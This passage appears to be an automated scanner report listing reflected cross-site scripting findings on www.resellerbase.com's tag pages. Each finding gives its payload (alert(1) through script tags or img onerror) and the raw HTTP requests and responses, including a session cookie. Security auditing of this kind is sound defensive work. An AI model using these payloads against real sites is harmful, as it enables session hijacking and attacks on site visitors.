The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/VOIPdd45a</title><img%20src%3da%20onerror%3dalert(1)>2472ebc6bb6d0045e?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/VOIP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: VOIPdd45a</title><img src=a onerror=alert(1)>2472ebc6bb6d0045e</title>
...[SNIP]...

2.4179. http://www.resellerbase.com/tag/VOIP [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/VOIP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a8a79<img%20src%3da%20onerror%3dalert(1)>4b26ee6a93f934250 was submitted in the REST URL parameter 2. This input was echoed as a8a79<img src=a onerror=alert(1)>4b26ee6a93f934250 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/VOIPa8a79<img%20src%3da%20onerror%3dalert(1)>4b26ee6a93f934250?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/VOIP
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9798

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: VOIPa
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : VOIPa8a79<img src=a onerror=alert(1)>4b26ee6a93f934250]</td>
...[SNIP]...

2.4180. http://www.resellerbase.com/tag/VOIP [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/VOIP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c55d2<img%20src%3da%20onerror%3dalert(1)>f97aac702d9 was submitted in the REST URL parameter 2. This input was echoed as c55d2<img src=a onerror=alert(1)>f97aac702d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/VOIPc55d2<img%20src%3da%20onerror%3dalert(1)>f97aac702d9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: VOIPc
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : VOIPc55d2<img src=a onerror=alert(1)>f97aac702d9]</td>
...[SNIP]...

2.4181. http://www.resellerbase.com/tag/VOIP [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/VOIP

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e13b2</title><img%20src%3da%20onerror%3dalert(1)>22d57472512 was submitted in the REST URL parameter 2. This input was echoed as e13b2</title><img src=a onerror=alert(1)>22d57472512 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/VOIPe13b2</title><img%20src%3da%20onerror%3dalert(1)>22d57472512 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/16/worldkom-net.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: VOIPe13b2</title><img src=a onerror=alert(1)>22d57472512</title>
...[SNIP]...

2.4182. http://www.resellerbase.com/tag/White+Label+SEO [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/White+Label+SEO

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2368e<script>alert(1)</script>640b569220e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag2368e<script>alert(1)</script>640b569220e/White+Label+SEO HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag2368e<script>alert(1)</script>640b569220e/White+Label+SEO was not found on this server.</p>
...[SNIP]...

2.4183. http://www.resellerbase.com/tag/adult [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ba47"><script>alert(1)</script>ec78fa98f58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /tag5ba47"><script>alert(1)</script>ec78fa98f58/adult HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;
Content-Type: application/x-www-form-urlencoded
Content-Length: 28

sort_by=title&sort_order=asc

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/tag5ba47"><script>alert(1)</script>ec78fa98f58/adult/more2.html" style="color: ">
...[SNIP]...

2.4184. http://www.resellerbase.com/tag/adult [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16dd4"><script>alert(1)</script>01e2cc30b82 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag16dd4"><script>alert(1)</script>01e2cc30b82/adult HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 55906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="/tag16dd4"><script>alert(1)</script>01e2cc30b82/adult/more2.html" style="color: ">
...[SNIP]...

2.4185. http://www.resellerbase.com/tag/adult [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2a038</title><img%20src%3da%20onerror%3dalert(1)>ffde05f86a5221597 was submitted in the REST URL parameter 2. This input was echoed as 2a038</title><img src=a onerror=alert(1)>ffde05f86a5221597 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/adult2a038</title><img%20src%3da%20onerror%3dalert(1)>ffde05f86a5221597?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult2a038</title><img src=a onerror=alert(1)>ffde05f86a5221597</title>
...[SNIP]...

2.4186. http://www.resellerbase.com/tag/adult [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 570d7<img%20src%3da%20onerror%3dalert(1)>ee7adbba298c42c1b was submitted in the REST URL parameter 2. This input was echoed as 570d7<img src=a onerror=alert(1)>ee7adbba298c42c1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/adult570d7<img%20src%3da%20onerror%3dalert(1)>ee7adbba298c42c1b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : adult570d7<img src=a onerror=alert(1)>ee7adbba298c42c1b]</td>
...[SNIP]...

2.4187. http://www.resellerbase.com/tag/adult [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bae97<img%20src%3da%20onerror%3dalert(1)>e6a4efb0062 was submitted in the REST URL parameter 2. This input was echoed as bae97<img src=a onerror=alert(1)>e6a4efb0062 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/adultbae97<img%20src%3da%20onerror%3dalert(1)>e6a4efb0062 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : adultbae97<img src=a onerror=alert(1)>e6a4efb0062]</td>
...[SNIP]...

2.4188. http://www.resellerbase.com/tag/adult [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload c2c75</title><img%20src%3da%20onerror%3dalert(1)>178e0613c93 was submitted in the REST URL parameter 2. This input was echoed as c2c75</title><img src=a onerror=alert(1)>178e0613c93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/adultc2c75</title><img%20src%3da%20onerror%3dalert(1)>178e0613c93 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adultc2c75</title><img src=a onerror=alert(1)>178e0613c93</title>
...[SNIP]...

2.4189. http://www.resellerbase.com/tag/adult+content [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult+content

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b5c21<script>alert(1)</script>ffd0acf0037486f3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagb5c21<script>alert(1)</script>ffd0acf0037486f3d/adult+content?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult+content
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagb5c21<script>alert(1)</script>ffd0acf0037486f3d/adult+content?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4190. http://www.resellerbase.com/tag/adult+content [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult+content

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d1b5<script>alert(1)</script>4524f89d6bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag6d1b5<script>alert(1)</script>4524f89d6bf/adult+content HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag6d1b5<script>alert(1)</script>4524f89d6bf/adult+content was not found on this server.</p>
...[SNIP]...

2.4191. http://www.resellerbase.com/tag/adult+content [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult+content

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 2d567</title><img%20src%3da%20onerror%3dalert(1)>a57b0468dee659e7 was submitted in the REST URL parameter 2. This input was echoed as 2d567</title><img src=a onerror=alert(1)>a57b0468dee659e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/adult+content2d567</title><img%20src%3da%20onerror%3dalert(1)>a57b0468dee659e7?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult+content
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9830

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult content2d567</title><img src=a onerror=alert(1)>a57b0468dee659e7</title>
...[SNIP]...

2.4192. http://www.resellerbase.com/tag/adult+content [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult+content

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload c1d3d</title><img%20src%3da%20onerror%3dalert(1)>6247e3c8b57 was submitted in the REST URL parameter 2. This input was echoed as c1d3d</title><img src=a onerror=alert(1)>6247e3c8b57 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/adult+contentc1d3d</title><img%20src%3da%20onerror%3dalert(1)>6247e3c8b57 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult contentc1d3d</title><img src=a onerror=alert(1)>6247e3c8b57</title>
...[SNIP]...

2.4193. http://www.resellerbase.com/tag/adult+content [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult+content

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 66e65<img%20src%3da%20onerror%3dalert(1)>e3ec462854e9d13ca was submitted in the REST URL parameter 2. This input was echoed as 66e65<img src=a onerror=alert(1)>e3ec462854e9d13ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/adult+content66e65<img%20src%3da%20onerror%3dalert(1)>e3ec462854e9d13ca?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/adult+content
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : adult content66e65<img src=a onerror=alert(1)>e3ec462854e9d13ca]</td>
...[SNIP]...

2.4194. http://www.resellerbase.com/tag/adult+content [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/adult+content

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1823d<img%20src%3da%20onerror%3dalert(1)>e05abd21e90 was submitted in the REST URL parameter 2. This input was echoed as 1823d<img src=a onerror=alert(1)>e05abd21e90 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/adult+content1823d<img%20src%3da%20onerror%3dalert(1)>e05abd21e90 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/30/spacash-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: adult
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : adult content1823d<img src=a onerror=alert(1)>e05abd21e90]</td>
...[SNIP]...

2.4195. http://www.resellerbase.com/tag/broadband [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/broadband

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad629<script>alert(1)</script>e95c0cc8a8d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagad629<script>alert(1)</script>e95c0cc8a8d/broadband HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:55:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

